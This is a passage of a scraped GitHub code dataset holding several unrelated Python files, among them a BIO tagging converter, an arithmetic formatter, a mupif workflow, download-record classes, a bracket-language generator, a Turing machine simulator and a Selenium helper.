flag_list[num_inde*2]\n if (str(i + 1) in str_end):\n behind_flage = flag_list[0]\n else:\n behind_flage = flag_list[num_inde*2]\n else:\n char_text = char_text + \" \" + flag_list[0]\n behind_flage = flag_list[0]\n data_flag.append(char_text)\n return data_flag\n\ndef flag_judge(index, str_begin,str_end):\n end_type = 0\n flag_result = 0\n for i in range(0,str_begin.__len__()):\n if(index >= int(str_begin[i]) and index < int(str_end[i])):\n end_type = i\n flag_result = 1\n return end_type, flag_result\n\ndef walkFile(file):\n files = os.listdir(file)\n files.sort()\n for file_ in files:\n f_name = str(file_)\n if (f_name[-4:].__eq__(\".txt\")):\n va.append(file + \"/\" + f_name)\n\ndef writetext(data_flag, file_path):\n f = open(file_path, 'a')\n for i in range(0,len(data_flag)):\n f.write(data_flag[i] + \"\\n\")\n f.write(\"\\n\")\n f.close()\n\n# Folders to convert\nfile_path_all = \"xxxxx/train/\"\n# Store files after conversion\nfile_path = \"xxxxx/train.txt\"\n\nva = []\nwalkFile(file_path_all)\nfor i in range(0,va.__len__()):\n data_flag = getdata(va[i])\n writetext(data_flag, file_path)\n\n\n","repo_name":"ultrumanti/boluo_zhou","sub_path":"label_program/BIO_create.py","file_name":"BIO_create.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35255248087","text":"import re\r\n\r\n\r\n# takes in strings does the maths\r\ndef stringMath(num1, num2, op):\r\n answer = 0\r\n if op == '+':\r\n answer = int(num1) + int(num2)\r\n elif op == '-':\r\n answer = int(num1) - int(num2)\r\n else:\r\n raise Exception('Error: Op must be \"+\" or \"-\"')\r\n return 
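# For readers unfamiliar with the scheme used by the BIO converter above: the
# first character of an entity span is tagged "B-<TYPE>", the rest "I-<TYPE>",
# and everything outside a span is "O". A minimal character-level illustration
# (offsets and label below are made up for the example):
def bio_tags(text, spans):
    """spans: list of (start, end, label) character offsets, end exclusive."""
    tags = ["O"] * len(text)
    for start, end, label in spans:
        tags[start] = "B-" + label
        for i in range(start + 1, end):
            tags[i] = "I-" + label
    return [f"{ch} {tag}" for ch, tag in zip(text, tags)]

# bio_tags("小麦条锈病", [(2, 5, "DISE")])
# -> ['小 O', '麦 O', '条 B-DISE', '锈 I-DISE', '病 I-DISE']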
answer\r\n\r\n\r\ndef arithmetic_arranger(probs, ans=False):\r\n Answers = ans\r\n each = []\r\n lenlist = []\r\n opList = []\r\n tL = list()\r\n bL = list()\r\n\r\n if len(probs) > 5:\r\n raise Exception('Error: Too many problems')\r\n for s in probs:\r\n each.append(s.split())\r\n# check for letters in numbers\r\n index = 0\r\n for e in each:\r\n longest = 0\r\n for part in e:\r\n if len(part) > longest:\r\n longest = len(part)\r\n lenlist.append(longest)\r\n\r\n for i in range(len(each)):\r\n if re.search('\\D', each[i][0]) is not None:\r\n raise Exception('Error: Numbers must only contain digits.')\r\n elif re.search('\\D', each[i][2]) is not None:\r\n raise Exception('Error: Numbers must only contain digits.')\r\n\r\n\r\n# print('Len List before add 2: ', lenlist)\r\n\r\n for line in probs:\r\n op = re.findall('.* ([+-])', line)\r\n\r\n if len(op) < 1:\r\n raise Exception('Error: Operator must be \"+\" or \"-\"')\r\n else:\r\n opList.append(op[0])\r\n# construct printable lines\r\n topLine = ''\r\n botLine = ''\r\n\r\n for index in range(len(lenlist)):\r\n lenlist[index] += 2\r\n topLine = topLine + ' '*(lenlist[index] - len(each[index][0])) + each[index][0] + ' '*4\r\n botLine = botLine + opList[index] + ' '*(lenlist[index] - len(each[index][2]) - 1) + each[index][2] + ' '*4\r\n\r\n topLine = topLine.rstrip()\r\n botLine = botLine.rstrip()\r\n# print(topLine)\r\n# print(botLine)\r\n# make dashes\r\n dashes = ''\r\n for i in range(len(lenlist)):\r\n dashes = dashes + '-'*lenlist[i] + ' '*4\r\n# print(dashes)\r\n dashes = dashes.rstrip()\r\n for s in probs:\r\n s.strip()\r\n top = re.findall('^[0-9]*', s)\r\n tL.append(top[0])\r\n bot = re.findall('.*\\s.* ([0-9]+)', s)\r\n bL.append(bot[0])\r\n if len(top[0]) < 1 or len(bot[0]) < 1:\r\n raise Exception('Error: Numbers must only contain digits.')\r\n elif len(top[0]) > 4 or len(bot[0]) > 4:\r\n raise Exception('Error: Numbers cannot be more than four digits.')\r\n\r\n# get answers if asked for\r\n# build return string\r\n returnstring = topLine + '\\n' + botLine + '\\n' + dashes\r\n# print(returnstring)\r\n if Answers is True:\r\n answerstring = ''\r\n for n in range(len(lenlist)):\r\n ans = stringMath(tL[n], bL[n], opList[n])\r\n answerstring = answerstring + ' '*(lenlist[n] - len(str(ans))) + str(ans) + ' '*4\r\n# print(answerstring)\r\n returnstring = returnstring + '\\n' + answerstring.rstrip()\r\n return returnstring\r\n else:\r\n return returnstring\r\n\r\n\r\nlistofstrings = [\"32 + 8\", \"1 - 3801\", \"9999 + 9999\", \"523 - 49\"]\r\n\r\n#arithmetic_arranger(listofstrings, True)\r\n#print()\r\n#arithmetic_arranger(listofstrings)\r\n#print()\r\nprint(arithmetic_arranger([\"32 + 698\", \"3801 - 2\", \"45 + 43\", \"123 + 49\"], True))\r\nprint()\r\n#arithmetic_arranger([\"32 + 8\", \"1 - 3801\", \"9999 + 9999\", \"523 - 49\"], True)\r\n\r\nx = arithmetic_arranger([\"3a3 + 5\"], True)\r\nprint(x)\r\n#arithmetic_arranger([\"35552 + 8\", \"1 - 3801\", \"9999 + 9999\", \"523 * 49\"], True)\r\n","repo_name":"Stablemadness/python_assignments","sub_path":"arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28472361887","text":"import sys\nsys.path.extend(['..', '../../..'])\nfrom mupif import *\nimport argparse\n# Read int for mode as number behind '-m' argument: 0-local (default), 1-ssh, 2-VPN\nmode = argparse.ArgumentParser(parents=[Util.getParentParser()]).parse_args().mode\nfrom Config import 
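# The column width used by the arranger above is max operand length + 2: one
# column for the operator plus at least one separating space. A compact
# illustration of the same right-alignment rule for a single problem (a
# sketch, independent of the full arranger):
def arrange_one(top, op, bottom):
    width = max(len(top), len(bottom)) + 2
    return "\n".join([top.rjust(width), op + bottom.rjust(width - 1), "-" * width])

print(arrange_one("32", "+", "698"))
# prints:
#    32
# + 698
# -----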
config\ncfg=config(mode)\nimport mupif.Physics.PhysicalQuantities as PQ\n\nimport logging\nlog = logging.getLogger()\n\nimport time as timeT\nstart = timeT.time()\n\nlog.info('Timer started')\n\n\nclass Example04(Workflow.Workflow):\n \n def __init__(self, metaData={}):\n MD = {\n 'Name': 'Simple application cummulating time steps',\n 'ID': 'N/A',\n 'Description': 'Cummulates time steps',\n 'Model_refs_ID': ['SimulationTimer-1'],\n 'Inputs': [\n {'Type': 'mupif.Property', 'Type_ID': 'mupif.PropertyID.PID_Time_step', 'Name': 'Time step',\n 'Description': 'Time step', 'Units': 's',\n 'Origin': 'Simulated', 'Required': True}],\n 'Outputs': [\n {'Type': 'mupif.Property', 'Type_ID': 'mupif.PropertyID.PID_Time', 'Name': 'Cummulative time',\n 'Description': 'Cummulative time', 'Units': 's', 'Origin': 'Simulated'}]\n }\n\n super(Example04, self).__init__(metaData=MD)\n self.updateMetadata(metaData)\n \n # locate nameserver\n ns = PyroUtil.connectNameServer(nshost=cfg.nshost, nsport=cfg.nsport, hkey=cfg.hkey)\n # connect to JobManager running on (remote) server and create a tunnel to it\n self.jobMan = PyroUtil.connectJobManager(ns, cfg.jobManName, cfg.hkey)\n log.info('Connected to JobManager')\n self.app1 = None\n self.contrib = Property.ConstantProperty(\n (0.,), PropertyID.PID_Time, ValueType.Scalar, 's', PQ.PhysicalQuantity(0., 's'))\n self.retprop = Property.ConstantProperty(\n (0.,), PropertyID.PID_Time, ValueType.Scalar, 's', PQ.PhysicalQuantity(0., 's'))\n\n try:\n self.app1 = PyroUtil.allocateApplicationWithJobManager(\n ns, self.jobMan, cfg.jobNatPorts[0], cfg.hkey,\n PyroUtil.SSHContext(sshClient=cfg.sshClient, options=cfg.options, sshHost=cfg.sshHost)\n )\n log.info(self.app1)\n except Exception as e:\n log.exception(e)\n\n appsig = self.app1.getApplicationSignature()\n log.info(\"Working application 1 on server \" + appsig)\n\n def initialize(self, file='', workdir='', targetTime=PQ.PhysicalQuantity('1 s'), metaData={}, validateMetaData=True, **kwargs):\n super().initialize(targetTime=targetTime, metaData=metaData)\n\n passingMD = {\n 'Execution': {\n 'ID': self.getMetadata('Execution.ID'),\n 'Use_case_ID': self.getMetadata('Execution.Use_case_ID'),\n 'Task_ID': self.getMetadata('Execution.Task_ID')\n }\n }\n self.app1.initialize(metaData=passingMD)\n\n def solveStep(self, istep, stageID=0, runInBackground=False):\n val = Property.ConstantProperty((1000,), PropertyID.PID_Time_step, ValueType.Scalar, 's')\n self.app1.setProperty(val)\n self.app1.solveStep(istep)\n self.retprop = self.app1.getProperty(PropertyID.PID_Time, istep.getTime())\n log.info(\"Sucessfully received \" + str(self.retprop.getValue(istep.getTime())))\n \n def terminate(self): \n self.app1.terminate()\n self.jobMan.terminate()\n super(Example04, self).terminate()\n log.info(\"Time elapsed %f s\" % (timeT.time()-start))\n\n def getProperty(self, propID, time, objectID=0):\n if propID == PropertyID.PID_Time:\n return Property.ConstantProperty(self.retprop.getValue(time), PropertyID.PID_Time, ValueType.Scalar, 's', time)\n else:\n raise APIError.APIError('Unknown property ID')\n \n def setProperty(self, property, objectID=0):\n if property.getPropertyID() == PropertyID.PID_Time_step:\n # remember the mapped value\n self.contrib = property\n else:\n raise APIError.APIError('Unknown property ID')\n\n def getCriticalTimeStep(self):\n return PQ.PhysicalQuantity(1.0, 's')\n\n def getApplicationSignature(self):\n return \"Example04 workflow 1.0\"\n\n def getAPIVersion(self):\n return \"1.0\"\n\n\nif __name__ == '__main__':\n 
targetTime = PQ.PhysicalQuantity('1 s')\n\n demo = Example04()\n\n executionMetadata = {\n 'Execution': {\n 'ID': '1',\n 'Use_case_ID': '1_1',\n 'Task_ID': '1'\n }\n }\n\n demo.initialize(targetTime=targetTime, metaData=executionMetadata)\n\n demo.solve()\n kpi = demo.getProperty(PropertyID.PID_Time, targetTime)\n demo.terminate()\n if kpi.getValue(targetTime)[0] == 1000.:\n log.info(\"Test OK\")\n kpi = 0\n sys.exit(0)\n else:\n log.info(\"Test FAILED\")\n kpi = 0\n sys.exit(1)\n","repo_name":"UstbCmsPjy/mupif","sub_path":"mupif/examples/Example04-jobMan-distrib/Example04.py","file_name":"Example04.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"11732653377","text":"import json\nimport time\nimport os\n\nimport config\n\ndef Timestamp():\n\treturn int(time.time())\n\ndef OptionalInDict(d, name):\n\tif name in d:\n\t\treturn d[name]\n\telse:\n\t\treturn None\n\nclass Record:\n\tdef __init__(self, uniqueID, downloaded, deadAsOf = None, quality = None, wasTooLong = None):\n\t\tself.uniqueID = uniqueID\n\t\tself.deadAsOf = deadAsOf\n\t\tself.downloaded = downloaded\n\t\tself.quality = quality\n\t\tself.wasTooLong = wasTooLong\n\n\tdef ToDict(self):\n\t\td = {}\n\t\td['uniqueID'] = self.uniqueID\n\t\tif self.deadAsOf is not None:\n\t\t\td['deadAsOf'] = self.deadAsOf\n\t\td['downloaded'] = self.downloaded\n\t\tif self.quality is not None:\n\t\t\td['quality'] = self.quality\n\t\tif self.wasTooLong is not None:\n\t\t\td['wasTooLong'] = self.wasTooLong\n\t\treturn d\n\n\t@staticmethod\n\tdef FromDict(d):\n\t\tuniqueID = d['uniqueID']\n\t\tdownloaded = d['downloaded']\n\t\tdeadAsOf = OptionalInDict(d, 'deadAsOf')\n\t\tquality = OptionalInDict(d, 'quality')\n\t\twasTooLong = OptionalInDict(d, 'wasTooLong')\n\t\treturn Record(uniqueID, downloaded, deadAsOf, quality, wasTooLong)\n\n\tdef VideoFileExists(self):\n\t\ttoFolder = config.GetVideoFolder()\n\t\tpath = toFolder + self.uniqueID\n\t\tdef ExistsWithExt(ext):\n\t\t\tif os.path.exists(path + ext):\n\t\t\t\tif os.path.getsize(path + ext) > 0:\n\t\t\t\t\treturn True\n\t\t\treturn False\n\t\treturn ExistsWithExt('.mp4') or ExistsWithExt('.flv') or ExistsWithExt('.swf')\n\nclass DownloadRecords:\n\tdef __init__(self, jsonStr = None):\n\t\tself.records = []\n\t\tif jsonStr is not None:\n\t\t\td = json.loads(jsonStr)\n\t\t\trecords = d['records']\n\t\t\tfor record in records:\n\t\t\t\tnewRecord = Record.FromDict(record)\n\t\t\t\tself.records.append(newRecord)\n\t\tself.savePath = None\n\n\tdef Serialize(self):\n\t\trecords = []\n\t\tfor record in self.records:\n\t\t\trecords.append(record.ToDict())\n\t\td = {}\n\t\td['records'] = records\n\t\treturn json.dumps(d, indent=4)\n\n\t@staticmethod\n\tdef LoadOrCreate(jsonPath = None):\n\t\tif jsonPath is None:\n\t\t\tjsonPath = config.GetDownloadRecordPath()\n\t\tif os.path.isfile(jsonPath):\n\t\t\tf = open(jsonPath, 'rb')\n\t\t\tbuf = f.read()\n\t\t\tbuf = buf.decode('utf8')\n\t\t\trecords = DownloadRecords(buf)\n\t\telse:\n\t\t\trecords = DownloadRecords()\n\t\trecords.SetSavePath(jsonPath)\n\t\treturn records\n\n\tdef SaveToFile(self):\n\t\tpath = self.savePath\n\t\tf = open(path, 'wb')\n\t\tbuf = self.Serialize()\n\t\tbytes = buf.encode('utf8')\n\t\tf.write(bytes)\n\t\tf.close()\n\n\tdef SetSavePath(self, path):\n\t\tself.savePath = path\n\n\tdef GetRecord(self, uniqueID):\n\t\tfor record in self.records:\n\t\t\tif record.uniqueID == uniqueID:\n\t\t\t\treturn record\n\t\treturn None\n\n\tdef HasRecord(self, 
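# Record and DownloadRecords in this module round-trip through JSON, and the
# optional fields (deadAsOf, quality, wasTooLong) are only serialised when
# set. A quick self-contained check of that contract (a sketch; no config
# paths are touched):
store = DownloadRecords()
store.AddRecord("abc123", downloaded=False)
restored = DownloadRecords(store.Serialize())
rec = restored.GetRecord("abc123")
assert rec is not None and rec.downloaded is False and rec.quality is None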
uniqueID):\n\t\tif self.GetRecord(uniqueID) is not None:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef AddRecord(self, uniqueID, downloaded, deadAsOf = None, quality = None, wasTooLong = None):\n\t\tself.records.append(Record(uniqueID, downloaded, deadAsOf, quality, wasTooLong))\n\n\tdef MarkDownloaded(self, uniqueID, quality):\n\t\trecord = self.GetRecord(uniqueID)\n\t\trecord.downloaded = True\n\t\trecord.quality = quality\n\n\tdef MarkDead(self, uniqueID):\n\t\trecord = self.GetRecord(uniqueID)\n\t\tif record.deadAsOf is None:\n\t\t\trecord.deadAsOf = Timestamp()\n\n\tdef MarkTooLong(self, uniqueID, lengthInSeconds):\n\t\trecord = self.GetRecord(uniqueID)\n\t\trecord.wasTooLong = lengthInSeconds\n\n\tdef UnmarkTooLong(self, uniqueID):\n\t\trecord = self.GetRecord(uniqueID)\n\t\trecord.wasTooLong = None\n\nclass VideoInfo:\n\tdef __init__(self, uniqueID, name = '', uploader = '', description = '', myName = '', myDesc = ''):\n\t\tself.uniqueID = uniqueID\n\t\tself.name = name\n\t\tself.uploader = uploader\n\t\tself.desc = description\n\t\tself.myName = myName\n\t\tself.myDesc = myDesc\n\n\t@staticmethod\n\tdef FromJson(uniqueID, jsonStr):\n\t\td = json.loads(jsonStr)\n\t\treturn VideoInfo(uniqueID, d['name'], d['uploader'], d['desc'], d['myName'], d['myDesc'])\n\n\tdef SaveToFile(self):\n\t\ttoFolder = config.GetInfoFolder()\n\n\t\tpath = toFolder + self.uniqueID + '.txt'\n\t\tf = open(path, 'wb')\n\t\tbuf = self.Serialize()\n\t\tbytes = buf.encode('utf8')\n\t\tf.write(bytes)\n\t\tf.close()\n\n\tdef Serialize(self):\n\t\td = {}\n\t\td['name'] = self.name\n\t\td['uploader'] = self.uploader\n\t\td['desc'] = self.desc\n\t\td['myName'] = self.myName\n\t\td['myDesc'] = self.myDesc\n\t\treturn json.dumps(d, ensure_ascii=False, indent=4)","repo_name":"sheepNEET/Raiment","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29496630586","text":"class Solution:\n def makeSubKSumEqual(self, arr: List[int], k: int) -> int:\n \n def getOperationsCount(arr: List[int]) -> int:\n sm, n = sum(arr), len(arr)\n mi = inf\n cur = 0\n for i, num in enumerate(sorted(arr)):\n mi = min(mi, (i * num - cur) + ((sm - cur) - (n - i) * num))\n cur += num\n return mi \n \n gcd = math.gcd(len(arr), k)\n return sum(getOperationsCount(arr[i :: gcd]) for i in range(gcd))","repo_name":"shivang257/LeetCode-Daily-Practice-Problem-Solutions","sub_path":"2607-make-k-subarray-sums-equal/2607-make-k-subarray-sums-equal.py","file_name":"2607-make-k-subarray-sums-equal.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"33591832608","text":"import numpy as np\nimport math\nimport random as random\nfrom random import randint\nfrom collections import OrderedDict\n\nbrackets = dict()\nbrackets[\"(\"] = \")\"\nbrackets[\"[\"] = \"]\"\nbrackets[\"{\"] = \"}\"\nbrackets[\"<\"] = \">\"\nbrackets = OrderedDict(sorted(brackets.items(), key=lambda t: t[0]))\n\ndef calculate_prob(my_brackets, cur_sent, num_types, prob, num_open):\n '''\n Calculate probability of a sentence given the probabilities of open brackets. \n '''\n sent_prob = 0\n counter = 0\n for bracket in cur_sent:\n if bracket in my_brackets:\n counter += 1\n ind = my_brackets.index(bracket)\n sent_prob += math.log(prob[ind],2)\n else:\n if counter build all valid sentences that contain only\n # one open bracket, i.e. 
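# Why makeSubKSumEqual() above groups by gcd(n, k): equal sums over every
# length-k window of a circular array force arr[i] == arr[(i + k) % n] for all
# i, so indices split into gcd(n, k) classes that can be equalised
# independently; within one class the cheapest common value is the median.
# The sorted-prefix trick above computes the same minimum; a direct median
# version for comparison (illustrative, not the submitted solution):
from math import gcd

def make_sub_k_sum_equal(arr, k):
    n, total = len(arr), 0
    g = gcd(n, k)
    for i in range(g):
        group = sorted(arr[i::g])
        median = group[len(group) // 2]
        total += sum(abs(x - median) for x in group)
    return total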
of length 2.\n sent_dict[start] = dict()\n for open_bracket in my_brackets:\n cur_sent = (open_bracket,brackets_dict[open_bracket])\n sent_dict[start][cur_sent] = calculate_prob(my_brackets, cur_sent, num_types, prob, start)\n else:\n # take an existing sentence dicionary and create a new one based on it\n sent_dict[start] = dict()\n for sent in sent_dict[start-1].keys():\n # copy the sentences from the old dictionary, calculate new probabilities\n sent_dict[start][sent] = calculate_prob(my_brackets, sent, num_types, prob, start)\n if len(sent)==start:\n # concatenate the existing sentence with itself to build a new one, e.g. ( ) -> ( ) ( )\n cur_sent = sent+sent\n # add it to the new dictionary, calculate probability\n sent_dict[start][cur_sent] = calculate_prob(my_brackets, cur_sent, num_types, prob, start)\n # sentences in an old dictionary can be concatenated with the ones in the new dictionary\n temp = dict()\n for tpl in sent_dict[start-1].keys():\n for sent in sent_dict[start].keys():\n n_sent = tpl+sent\n if len(n_sent)/2 <= start and not n_sent in sent_dict[start].keys():\n temp[n_sent] = calculate_prob(my_brackets, n_sent, num_types, prob, start)\n t_sent = sent+tpl\n if len(t_sent)/2 <= start and not t_sent in sent_dict[start].keys():\n temp[t_sent] = calculate_prob(my_brackets, t_sent, num_types, prob, start)\n sent_dict[start].update(temp)\n # just take a sentence from an old dictionary and add a couple of brackets more\n # do it for all possible bracket types\n for open_bracket in my_brackets:\n for tpl in sent_dict[start-1].keys():\n # at the front\n cur_sent_front = (open_bracket,)+(brackets_dict[open_bracket],)+tpl\n if not cur_sent_front in sent_dict[start].keys():\n sent_dict[start][cur_sent_front] = calculate_prob(my_brackets, cur_sent_front, num_types, prob, start)\n # at the back\n cur_sent_back = tpl+(open_bracket,)+(brackets_dict[open_bracket],)\n if not cur_sent_back in sent_dict[start].keys():\n sent_dict[start][cur_sent_back] = calculate_prob(my_brackets, cur_sent_back, num_types, prob, start)\n # around\n cur_sent_around = (open_bracket,)+tpl+(brackets_dict[open_bracket],)\n if not cur_sent_around in sent_dict[start].keys():\n sent_dict[start][cur_sent_around] = calculate_prob(my_brackets, cur_sent_around, num_types, prob, start) \n start += 1\n # normalize sentence probabilities so that they sum up to 1\n s = sum(sent_dict[max_len_open].values())\n for k,v in sent_dict[max_len_open].items():\n sent_dict[max_len_open][k] = float(v)/s\n return sent_dict[max_len_open] #, sum(sent_dict[max_len_open].values()), len(sent_dict[max_len_open].keys())\n\n\ndef generate_text_with_ppl(name, sent_dict, num_sent):\n with open(name, \"w\") as f:\n sent_dict = OrderedDict(sorted(sent_dict.items(), key=lambda t: t[0]))\n prob = list(sent_dict.values())\n l = list(sent_dict.keys())\n text_prob = 0\n text_length = 0\n while num_sent>0:\n # choose a sentence according to its probability\n curr_sent = np.random.choice(l, 1, p=prob)[0]\n text_prob += math.log(sent_dict[curr_sent],2)\n text_length += len(curr_sent)+1\n num_sent -= 1\n curr = \" \".join(curr_sent)+\"\\n\"\n f.write(curr)\n # return estimated perplexity of the generated text\n return pow(2, -(text_prob/text_length))\n\n\ndef read_ppl(file_test, file_train, offset, counter_step):\n '''\n Read perplexity results based on RNN model from file.\n '''\n ind = []\n ppl_test = []\n ppl_train = []\n with open(file_test, 'r') as f, open(file_train, 'r') as g:\n counter = offset\n for line in f:\n ind.append(counter)\n counter += 
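# generate_text_with_ppl() above returns the usual base-2 perplexity,
#     PPL = 2 ** ( -(1/N) * sum(log2 p(sentence_i)) ),
# where N counts brackets plus one end-of-sentence symbol per line. A minimal
# check of that formula on a two-sentence toy distribution:
import math

probs = [0.5, 0.25]   # hypothetical sentence probabilities
lengths = [3, 3]      # 2 brackets + <eos> each
log_prob = sum(math.log2(p) for p in probs)
ppl = 2 ** (-log_prob / sum(lengths))
print(round(ppl, 4))  # 2^(3/6) ~= 1.4142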
counter_step\n ppl_test.append(float(line.strip()))\n for line in g:\n ppl_train.append(float(line.strip()))\n return ind, ppl_test, ppl_train\n\n\ndef calc_baseline_ppl(max_len, p):\n '''\n Calculate baseline perplexity for a text consisting of sentences that contain\n only one type of brackets. Maximal number of open brackets in a sentence = max_len\n (less is possible), p is a probability of an open bracket. Length of a sentence is\n defined by a number of brackets in it + symbol (end of sentence).\n\n !!! Probably to be changed later to include various types of brackets and only certain lengths !!!\n '''\n num_symb_len_max = sum([(2*max_len+1)*p**(max_len-1)*(1-p)**k for k in range(0,max_len)])\n num_symb_len_k = sum([(2*k+1)*p**(k-1)*(1-p)**(k+1) for k in range(1,max_len)])\n denominator = num_symb_len_max + num_symb_len_k\n part1 = sum([p**(max_len-1)*(1-p)**k*math.log(p**(max_len-1)*(1-p)**k,2) for k in range(0,max_len)])\n part2 = sum(p**(k-1)*(1-p)**(k+1)*math.log(p**(k-1)*(1-p)**(k+1),2) for k in range(1,max_len))\n numerator = -(part1+part2)\n ppl = pow(2,numerator/denominator)\n return ppl\n","repo_name":"NataliaSkachkova/rules_with_NN","sub_path":"Py Scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33767554340","text":"class tupla_transicion:\r\n def __init__(self, _estado, _caracter , _direccion):\r\n self.estado = _estado\r\n self.caracter = _caracter\r\n self.direccion = _direccion\r\n\r\nclass turing_machine:\r\n def __init__(self, transicion, string_cinta):\r\n if isinstance(transicion, dict):\r\n self.tabla_transicion = transicion\r\n self.cinta = list(string_cinta)\r\n self.current_state = 's'\r\n self.current_position = 0\r\n def strart(self):\r\n result = False\r\n if self.current_state == 's':\r\n while (self.current_state!= 'Alto' and self.current_state!= 'Si' and self.current_state!= 'No' and self.current_state !='Error'):\r\n car = self.cinta[self.current_position]\r\n tupla = \"('\" + self.current_state + \"', '\" + car + \"')\"\r\n if tupla in self.tabla_transicion:\r\n accion = self.tabla_transicion[tupla]\r\n if isinstance(accion, tupla_transicion):\r\n self.current_state = accion.estado\r\n print(self.cinta[self.current_position], accion.caracter, accion.direccion, accion.estado)\r\n self.cinta[self.current_position] = accion.caracter\r\n if accion.direccion == 'l':\r\n self.current_position = self.current_position - 1\r\n else:\r\n if accion.direccion == 'r':\r\n self.current_position = self.current_position + 1\r\n else:\r\n if accion.direccion != 'o':\r\n #salida si hay error\r\n self.current_state = 'Error'\r\n\r\n if self.current_state!= 'Alto' or self.current_state!= 'Si' or self.current_state!= 'No':\r\n result = True\r\n return result\r\n\r\n # { a^nb^2n | n > 0 } Acepta cadena donde por cada a bebe haber el dooble de b, ejemplo abb, aabbbb, aabbb, n es mayor a 0\r\n #Andres Sebastian Sierra Ruiz, Teoría Automatas, grupo:008 #1747193\r\nMT = dict()\r\n\r\nstri = '@'\r\nstri2 = 'aabbbb@' #Probar @aaabbbbbb, @aaabbb, @aaaabbbbbbbb, @aaaabb\r\n#q0 = s , q1 = t q2= u q3 = v\r\n\r\nMT[\"('s', '@')\"] = tupla_transicion('No', '@', 'o')\r\nMT[\"('s', 'a')\"] = tupla_transicion('t', 'x', 'r')\r\nMT[\"('t', 'a')\"] = tupla_transicion('t', 'a', 'r')\r\nMT[\"('t', 'y')\"] = tupla_transicion('t', 'y', 'r')\r\nMT[\"('t', 'b')\"] = tupla_transicion('u', 'y', 'r')\r\nMT[\"('u', 'b')\"] = tupla_transicion('v', 'y', 
'l')\r\nMT[\"('v', 'a')\"] = tupla_transicion('v', 'a', 'l')\r\nMT[\"('v', 'y')\"] = tupla_transicion('v', 'y', 'l')\r\nMT[\"('v', 'x')\"] = tupla_transicion('s', 'x', 'r')\r\nMT[\"('s', 'y')\"] = tupla_transicion('Sí', '@', 'o')\r\n\r\n\r\n\r\ntm = turing_machine(MT,stri)\r\nresult = tm.strart()\r\nprint(result)\r\nprint(tm.current_state, tm.current_position)\r\n\r\n\r\n\r\ntm = turing_machine(MT,stri2)\r\nresult = tm.strart()\r\nprint(result)\r\nprint(tm.current_state, tm.current_position)\r\n","repo_name":"Sebas-1798/TeoriaAutomatas_PIA_1747193_Sierra_Ruiz","sub_path":"TuringMachine2_PIA_Sierra_Ruiz_Andres_Sebastian.py","file_name":"TuringMachine2_PIA_Sierra_Ruiz_Andres_Sebastian.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23892324758","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef f(x, y):\n return np.sin(np.sqrt(x ** 2 + y ** 2))\n\nr = np.linspace(0, 6, 20)\ntheta = np.linspace(-0.9 * np.pi, 0.8 * np.pi, 40)\nr, theta = np.meshgrid(r, theta)\n\nX = r * np.sin(theta)\nprint(type(X))\nprint(np.shape(X))\nY = r * np.cos(theta)\nprint(type(Y))\nprint(np.shape(Y))\nZ = f(X, Y)\nprint(type(Z))\nprint(np.shape(Z))\nax = plt.axes(projection='3d')\nax.plot_surface(X, Y, Z, rstride=1, cstride=1,\n cmap='viridis', edgecolor='none');\n\nplt.show()\n","repo_name":"ShiversVert/Snake_Project","sub_path":"ImageProcessing/test_affichage_3D.py","file_name":"test_affichage_3D.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42424910466","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\n# @Time : 2020/8/31 11:30 \n# @Author : wei.zhang\n# @File : webdriveroperator.py\n# @Software: PyCharm\n\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom Util.conf import config\nfrom Util.log import log\nfrom Util.fileDirConfig.getfiledir import SCREENCAPTUREDIR\n\n\nclass WebdriverOperator(object):\n\n def __init__(self, driver: Chrome = None):\n self.driver = driver\n self.timeout = config.get('TIMEOUT')\n self.poll_frequency = config.get('POLL_FREQUENCY')\n self.deriver_type = 'chrome'\n\n def get_screenshot_as_file(self):\n \"\"\"\n 截屏保存\n :return:返回路径\n \"\"\"\n pic_name = str.split(str(time.time()), '.')[0] + str.split(str(time.time()), '.')[\n 1] + '.png'\n screent_path = SCREENCAPTUREDIR + '/' + pic_name\n self.driver.get_screenshot_as_file(screent_path)\n return screent_path\n\n def gotosleep(self, **kwargs):\n log.warning('线程等待:3秒')\n time.sleep(3)\n return True, '等待成功'\n\n def web_implicitly_wait(self, **kwargs):\n \"\"\"\n 隐式等待\n :return:\n type_ 存时间\n \"\"\"\n try:\n s = kwargs['time']\n except KeyError:\n s = 10\n log.info('隐式等待 元素加载完成')\n try:\n self.driver.implicitly_wait(s)\n except NoSuchElementException:\n return False, '隐式等待 页面元素未加载完成'\n return True, '隐式等待 元素加载完成'\n\n def __find_element(self, locator: tuple):\n \"\"\"\n :param tuple locator:(By.xxxxx, locator)定位参数\n :return:返回元素对象\n \"\"\"\n try:\n elem = WebDriverWait(self.driver, self.timeout, self.poll_frequency).until(\n lambda x: x.find_element(*locator))\n except NoSuchElementException:\n log('元素[' + locator[1] + ']等待出现超时')\n return False, '元素[' + locator[1] + ']等待出现超时'\n return True, 
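# Caveat on the machine above: the accepting transition writes state 'Sí'
# (accented) while the run loop tests for 'Si' (unaccented), so on an accepted
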